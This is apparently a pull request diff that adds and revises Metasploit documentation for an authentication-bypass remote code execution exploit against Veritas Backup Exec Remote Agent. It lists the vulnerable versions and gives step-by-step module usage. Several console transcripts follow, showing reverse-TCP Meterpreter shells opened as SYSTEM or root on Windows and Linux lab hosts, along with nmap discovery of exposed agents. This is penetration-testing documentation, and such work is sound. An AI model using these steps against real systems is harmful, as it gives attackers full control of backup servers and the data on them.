### PR TITLE
Veritas Backup Exec Agent Authentication Bypass RCE

### DIFF
--- a/documentation/modules/exploit/multi/veritas/beagent_sha_auth_rce.md
+++ b/documentation/modules/exploit/multi/veritas/beagent_sha_auth_rce.md
@@ -1,0 +1,329 @@
+## Vulnerable Application
+
+Backup Exec consists of a server component as well as remote agents that are
+installed on each host that should be backed up by the server.
+
+There are remote agents available for a range of data sources, including
+operating-system level agents for Windows and Linux hosts' local filesystems,
+application-specific agents for Microsoft Exchange, SharePoint, Active
+Directory, etc., and agents for virtual machines such as VMware or Hyper-V
+instances. This exploit targets the Windows and Linux OS-level remote agents.
+The agents are installed as services running by default with
+`NT AUTHORITY\SYSTEM` or `root` user rights for Windows and Linux respectively.
+
+Vulnerable Backup Exec Remote Agent versions are 9.3 and below. These
+agents' versions are distributed with Backup Exec versions 21.1 and below.
+
+A trial version of Backup Exec can be downloaded from Veritas'
+[website](https://www.veritas.com/form/trialware/backup-exec).
+All supported version of Backup Exec is available in Veritas'
+[download center](https://www.veritas.com/content/support/en_US/downloads/).
+
+## Verification Steps
+
+1. Download Backup Exec distributive and install Backup Exec Remote
+   Agent on Windows or Linux host.
+2. Start `msfconsole`.
+3. Select the module and set the address of the host running the remote agent:
+```
+   use exploit/multi/veritas/beagent_sha_auth_rce
+   set RHOSTS [REMOTE_AGENT_HOST]
+```
+4. Check the service is running and potentially vulnerable with the `check`
+   command.
+5. Set TARGET (Windows or Linux) depending on operating system on the host
+   running the remote agent:
+```
+   set TARGET [OS_NAME]
+```
+6. Set and configure preferred payload:
+```
+   set PAYLOAD [PAYLOAD_NAME]
+   set LHOST [LOCAL_IP]
+   set LPORT [LOCAL_PORT]
+```
+7. If Backup Exec Remote Agent run on the Linux then set preferred interpreter
+   to execute the command (by default, `/bin/bash`). The option does not matter
+   for Windows hosts since the command will always be executed using
+   `C:\Windows\System32\cmd.exe`.
+```
+   set INTERPRETER [INTERPRETER_NAME]
+```
+8. Start the module using the `exploit` command.
+9. Enjoy the received shell.
+
+An example session is as follows:
+
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.141
+RHOSTS => 172.16.180.141
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.141:10000 - Checking vulnerability
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Getting supported authentication types
+Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+BE agent revision: 9.3
+[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set TARGET Windows
+TARGET => Windows
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set LHOST 172.16.180.248
+LHOST => 172.16.180.248
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
+
+Module options (exploit/multi/veritas/beagent_sha_auth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   RHOSTS   172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    10000            yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addr
+                                       esses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.141:10000 - Exploiting ...
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
+[*] 172.16.180.141:10000 - Passing SHA authentication
+[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
+[*] Sending stage (175686 bytes) to 172.16.180.141
+[*] Meterpreter session 1 opened (172.16.180.248:4444 -> 172.16.180.141:49630) at 2022-09-12 01:44:44 +0300
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```
+
+## Options
+
+### INTERPRETER
+The command line interpreter for executing Linux OS command. By default, the option is
+`/bin/bash`. For Windows the option does not matter and the command will always be
+executed using `C:\Windows\System32\cmd.exe`.
+
+## Scenarios
+
+The Backup Exec Remote Agent is installed on each host that has local filesystems
+that should be backed up. These agents listen on the network for NDMP connections
+(10000/tcp), appearing in Nmap scans with scripts enabled as follows:
+
+```
+$ nmap -p10000 -n 172.16.180.0/24 --open -vvv
+...
+Discovered open port 10000/tcp on 172.16.180.133
+Discovered open port 10000/tcp on 172.16.180.132
+Discovered open port 10000/tcp on 172.16.180.141
+...
+$ nmap -p10000 -n -sV 172.16.180.133
+...
+10000/tcp open  ndmp    Symantec/Veritas Backup Exec ndmp (NDMPv3)
+...
+```
+
+(Note that the `ndmp-version` script fails to execute due to not sending an
+`NDMP_CONNECT_OPEN` request before querying version information with the
+`NDMP_CONFIG_GET_HOST_INFO` request. This exploit module's `check` command will
+carry this query out successfully.)
+
+### Windows; Backup Exec 21.0 (Backup Exec Remote Agent, revision 9.3)
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.141
+RHOSTS => 172.16.180.141
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.141:10000 - Checking vulnerability
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Getting supported authentication types
+Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+BE agent revision: 9.3
+[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set TARGET Windows
+TARGET => Windows
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set LHOST 172.16.180.248
+LHOST => 172.16.180.248
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
+
+Module options (exploit/multi/veritas/beagent_sha_auth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   RHOSTS   172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    10000            yes       The target port (TCP)
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.141:10000 - Exploiting ...
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
+[*] 172.16.180.141:10000 - Passing SHA authentication
+[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
+[*] Sending stage (175686 bytes) to 172.16.180.141
+[*] Meterpreter session 2 opened (172.16.180.248:4444 -> 172.16.180.141:49630) at 2022-09-12 01:44:44 +0300
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+```
+
+### Linux; Backup Exec 16.0 (Backup Exec Remote Agent, revision 9.2)
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.136
+RHOSTS => 172.16.180.136
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.136:10000 - Checking vulnerability
+[*] 172.16.180.136:10000 - Connecting to BE Agent service
+[*] 172.16.180.136:10000 - Getting supported authentication types
+Supported authentication by BE agent: BEWS2 (190), SHA (5)
+BE agent revision: 9.2
+[*] 172.16.180.136:10000 - The target appears to be vulnerable. SHA authentication is enabled
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set TARGET Linux
+TARGET => Linux
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
+PAYLOAD => linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set LHOST 172.16.180.248
+LHOST => 172.16.180.248
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set INTERPRETER /bin/bash
+INTERPRETER => /bin/bash
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
+
+Module options (exploit/multi/veritas/beagent_sha_auth_rce):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   INTERPRETER  /bin/bash        yes       The command line interpreter for executing OS command
+   RHOSTS       172.16.180.136   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        10000            yes       The target port (TCP)
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.16.180.248   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux
+
+
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.136:10000 - Exploiting ...
+[*] 172.16.180.136:10000 - Connecting to BE Agent service
+[*] 172.16.180.136:10000 - Enabling TLS for NDMP connection
+[*] 172.16.180.136:10000 - Passing SHA authentication
+[*] 172.16.180.136:10000 - Uploading payload with CmdStager
+[*] 172.16.180.136:10000 - Command Stager progress -  39.74% done (302/760 bytes)
+[*] Sending stage (989032 bytes) to 172.16.180.136
+[*] 172.16.180.136:10000 - Command Stager progress - 100.00% done (760/760 bytes)
+[*] Meterpreter session 3 opened (172.16.180.248:4444 -> 172.16.180.136:49264) at 2022-09-12 01:52:35 +0300
+
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```
+
+### Windows; Backup Exec 21.2 (Backup Exec Remote Agent, revision 9.4) - NOT VULNERABLE
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.140
+RHOSTS => 172.16.180.140
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.140:10000 - Checking vulnerability
+[*] 172.16.180.140:10000 - Connecting to BE Agent service
+[*] 172.16.180.140:10000 - Getting supported authentication types
+Supported authentication by BE agent: BEWS2 (190), SSPI (4)
+BE agent revision: 9.4
+[*] 172.16.180.140:10000 - The target is not exploitable. SHA authentication is disabled
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
+
+Module options (exploit/multi/veritas/beagent_sha_auth_rce):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.180.140   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT   10000            yes       The target port (TCP)
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.140:10000 - Exploiting ...
+[*] 172.16.180.140:10000 - Connecting to BE Agent service
+[*] 172.16.180.140:10000 - Enabling TLS for NDMP connection
+[*] 172.16.180.140:10000 - Passing SHA authentication
+[-] 172.16.180.140:10000 - Can not authenticate with SHA. Error code of NDMP_CONFIG_GET_AUTH_ATTR (0x103) packet: 9
+[*] Exploit completed, but no session was created.
+```

--- a/documentation/modules/exploit/multi/veritas/beagent_sha_auth_rce.md
+++ b/documentation/modules/exploit/multi/veritas/beagent_sha_auth_rce.md
@@ -55,37 +55,20 @@ All supported version of Backup Exec is available in Veritas'
 An example session is as follows:
 
 ```
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.141
-RHOSTS => 172.16.180.141
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
-
-[*] 172.16.180.141:10000 - Checking vulnerability
-[*] 172.16.180.141:10000 - Connecting to BE Agent service
-[*] 172.16.180.141:10000 - Getting supported authentication types
-Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
-BE agent revision: 9.3
-[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set TARGET Windows
-TARGET => Windows
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
-PAYLOAD => windows/meterpreter/reverse_tcp
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set LHOST 172.16.180.248
-LHOST => 172.16.180.248
+msf6 > use exploit/multi/veritas/beagent_sha_auth_rce
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.141
+rhosts => 172.16.180.141
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
+lhost => 172.16.180.248
 msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
 
 Module options (exploit/multi/veritas/beagent_sha_auth_rce):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   RHOSTS   172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT    10000            yes       The target port (TCP)
-   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addr
-                                       esses.
-   SRVPORT  8080             yes       The local port to listen on.
-   SSL      false            no        Negotiate SSL for incoming connections
-   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
-   URIPATH                   no        The URI to use for this exploit (default is random)
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT   10000            yes       The target port (TCP)
 
 
 Payload options (windows/meterpreter/reverse_tcp):
@@ -104,21 +87,43 @@ Exploit target:
    0   Windows
 
 
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.141:10000 - Checking vulnerability
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Getting supported authentication types
+[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 172.16.180.141:10000 - BE agent revision: 9.3
+[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
 msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
 
 [*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.141:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.180.141:10000 - Checking vulnerability
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Getting supported authentication types
+[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 172.16.180.141:10000 - BE agent revision: 9.3
+[+] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
 [*] 172.16.180.141:10000 - Exploiting ...
 [*] 172.16.180.141:10000 - Connecting to BE Agent service
 [*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
 [*] 172.16.180.141:10000 - Passing SHA authentication
 [*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
 [*] Sending stage (175686 bytes) to 172.16.180.141
-[*] Meterpreter session 1 opened (172.16.180.248:4444 -> 172.16.180.141:49630) at 2022-09-12 01:44:44 +0300
+[*] Meterpreter session 1 opened (172.16.180.248:4444 -> 172.16.180.141:49629) at 2022-09-23 10:33:42 +0300
 
-meterpreter > getuid 
+meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : TEST-PC
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
 meterpreter > 
-
 ```
 
 ## Options
@@ -154,176 +159,114 @@ carry this query out successfully.)
 
 ### Windows; Backup Exec 21.0 (Backup Exec Remote Agent, revision 9.3)
 ```
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.141
-RHOSTS => 172.16.180.141
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
-
-[*] 172.16.180.141:10000 - Checking vulnerability
-[*] 172.16.180.141:10000 - Connecting to BE Agent service
-[*] 172.16.180.141:10000 - Getting supported authentication types
-Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
-BE agent revision: 9.3
-[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set TARGET Windows
-TARGET => Windows
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
-PAYLOAD => windows/meterpreter/reverse_tcp
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set LHOST 172.16.180.248
-LHOST => 172.16.180.248
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
-
-Module options (exploit/multi/veritas/beagent_sha_auth_rce):
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   RHOSTS   172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT    10000            yes       The target port (TCP)
-
-
-Payload options (windows/meterpreter/reverse_tcp):
-
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
-   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
-   LPORT     4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Windows
-
-
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 192.168.123.147
+rhosts => 192.168.123.147
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 192.168.123.1
+lhost => 192.168.123.1
 msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
 
-[*] Started reverse TCP handler on 172.16.180.248:4444 
-[*] 172.16.180.141:10000 - Exploiting ...
-[*] 172.16.180.141:10000 - Connecting to BE Agent service
-[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
-[*] 172.16.180.141:10000 - Passing SHA authentication
-[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
-[*] Sending stage (175686 bytes) to 172.16.180.141
-[*] Meterpreter session 2 opened (172.16.180.248:4444 -> 172.16.180.141:49630) at 2022-09-12 01:44:44 +0300
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.123.147:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.123.147:10000 - Checking vulnerability
+[*] 192.168.123.147:10000 - Connecting to BE Agent service
+[*] 192.168.123.147:10000 - Getting supported authentication types
+[*] 192.168.123.147:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 192.168.123.147:10000 - BE agent revision: 9.3
+[+] 192.168.123.147:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 192.168.123.147:10000 - Exploiting ...
+[*] 192.168.123.147:10000 - Connecting to BE Agent service
+[*] 192.168.123.147:10000 - Enabling TLS for NDMP connection
+[*] 192.168.123.147:10000 - Passing SHA authentication
+[*] 192.168.123.147:10000 - Uploading payload with NDMP_FILE_WRITE packet
+[*] Sending stage (175686 bytes) to 192.168.123.147
+[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.147:49835) at 2022-09-22 15:23:19 -0400
 
-meterpreter > getuid 
+meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
-meterpreter > 
+meterpreter > sysinfo
+Computer        : DESKTOP-BE1QFC9
+OS              : Windows 10 (10.0 Build 19041).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.123.147 - Meterpreter session 1 closed.  Reason: User exit
 ```
 
 ### Linux; Backup Exec 16.0 (Backup Exec Remote Agent, revision 9.2)
 ```
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.136
-RHOSTS => 172.16.180.136
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
-
-[*] 172.16.180.136:10000 - Checking vulnerability
-[*] 172.16.180.136:10000 - Connecting to BE Agent service
-[*] 172.16.180.136:10000 - Getting supported authentication types
-Supported authentication by BE agent: BEWS2 (190), SHA (5)
-BE agent revision: 9.2
-[*] 172.16.180.136:10000 - The target appears to be vulnerable. SHA authentication is enabled
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set TARGET Linux
-TARGET => Linux
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
-PAYLOAD => linux/x86/meterpreter/reverse_tcp
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set LHOST 172.16.180.248
-LHOST => 172.16.180.248
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set INTERPRETER /bin/bash
-INTERPRETER => /bin/bash
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
-
-Module options (exploit/multi/veritas/beagent_sha_auth_rce):
-
-   Name         Current Setting  Required  Description
-   ----         ---------------  --------  -----------
-   INTERPRETER  /bin/bash        yes       The command line interpreter for executing OS command
-   RHOSTS       172.16.180.136   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT        10000            yes       The target port (TCP)
-
-
-Payload options (linux/x86/meterpreter/reverse_tcp):
-
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST  172.16.180.248   yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   1   Linux
-
-
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.199.133
+rhosts => 172.16.199.133
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set target 1
+target => 1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
 msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
 
-[*] Started reverse TCP handler on 172.16.180.248:4444 
-[*] 172.16.180.136:10000 - Exploiting ...
-[*] 172.16.180.136:10000 - Connecting to BE Agent service
-[*] 172.16.180.136:10000 - Enabling TLS for NDMP connection
-[*] 172.16.180.136:10000 - Passing SHA authentication
-[*] 172.16.180.136:10000 - Uploading payload with CmdStager
-[*] 172.16.180.136:10000 - Command Stager progress -  39.74% done (302/760 bytes)
-[*] Sending stage (989032 bytes) to 172.16.180.136
-[*] 172.16.180.136:10000 - Command Stager progress - 100.00% done (760/760 bytes)
-[*] Meterpreter session 3 opened (172.16.180.248:4444 -> 172.16.180.136:49264) at 2022-09-12 01:52:35 +0300
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.133:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.133:10000 - Checking vulnerability
+[*] 172.16.199.133:10000 - Connecting to BE Agent service
+[*] 172.16.199.133:10000 - Getting supported authentication types
+[*] 172.16.199.133:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5)
+[*] 172.16.199.133:10000 - BE agent revision: 9.2
+[+] 172.16.199.133:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 172.16.199.133:10000 - Exploiting ...
+[*] 172.16.199.133:10000 - Connecting to BE Agent service
+[*] 172.16.199.133:10000 - Enabling TLS for NDMP connection
+[*] 172.16.199.133:10000 - Passing SHA authentication
+[*] 172.16.199.133:10000 - Uploading payload with CmdStager
+[*] 172.16.199.133:10000 - Command Stager progress -  44.15% done (362/820 bytes)
+[*] Sending stage (3020772 bytes) to 172.16.199.133
+[*] 172.16.199.133:10000 - Command Stager progress - 100.00% done (820/820 bytes)
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.133:55062) at 2022-09-22 15:17:01 -0400
 
 meterpreter > getuid
 Server username: root
-meterpreter > 
+meterpreter > sysinfo
+Computer     : debian.test.com
+OS           : Debian 9.13 (Linux 4.9.0-19-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > Interrupt: use the 'exit' command to quit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.16.199.133 - Meterpreter session 2 closed.  Reason: User exit
 ```
 
 ### Windows; Backup Exec 21.2 (Backup Exec Remote Agent, revision 9.4) - NOT VULNERABLE
 ```
 msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.140
-RHOSTS => 172.16.180.140
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.135
+rhosts => 172.16.180.135
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
+lhost => 172.16.180.248
 msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
 
-[*] 172.16.180.140:10000 - Checking vulnerability
-[*] 172.16.180.140:10000 - Connecting to BE Agent service
-[*] 172.16.180.140:10000 - Getting supported authentication types
-Supported authentication by BE agent: BEWS2 (190), SSPI (4)
-BE agent revision: 9.4
-[*] 172.16.180.140:10000 - The target is not exploitable. SHA authentication is disabled
-msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
-
-Module options (exploit/multi/veritas/beagent_sha_auth_rce):
-
-   Name    Current Setting  Required  Description
-   ----    ---------------  --------  -----------
-   RHOSTS  172.16.180.140   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT   10000            yes       The target port (TCP)
-
-
-Payload options (windows/meterpreter/reverse_tcp):
-
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
-   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
-   LPORT     4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Windows
-
-
+[*] 172.16.180.135:10000 - Checking vulnerability
+[*] 172.16.180.135:10000 - Connecting to BE Agent service
+[*] 172.16.180.135:10000 - Getting supported authentication types
+[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
+[*] 172.16.180.135:10000 - BE agent revision: 9.4
+[*] 172.16.180.135:10000 - The target is not exploitable. SHA authentication is disabled
 msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
 
 [*] Started reverse TCP handler on 172.16.180.248:4444 
-[*] 172.16.180.140:10000 - Exploiting ...
-[*] 172.16.180.140:10000 - Connecting to BE Agent service
-[*] 172.16.180.140:10000 - Enabling TLS for NDMP connection
-[*] 172.16.180.140:10000 - Passing SHA authentication
-[-] 172.16.180.140:10000 - Can not authenticate with SHA. Error code of NDMP_CONFIG_GET_AUTH_ATTR (0x103) packet: 9
+[*] 172.16.180.135:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.180.135:10000 - Checking vulnerability
+[*] 172.16.180.135:10000 - Connecting to BE Agent service
+[*] 172.16.180.135:10000 - Getting supported authentication types
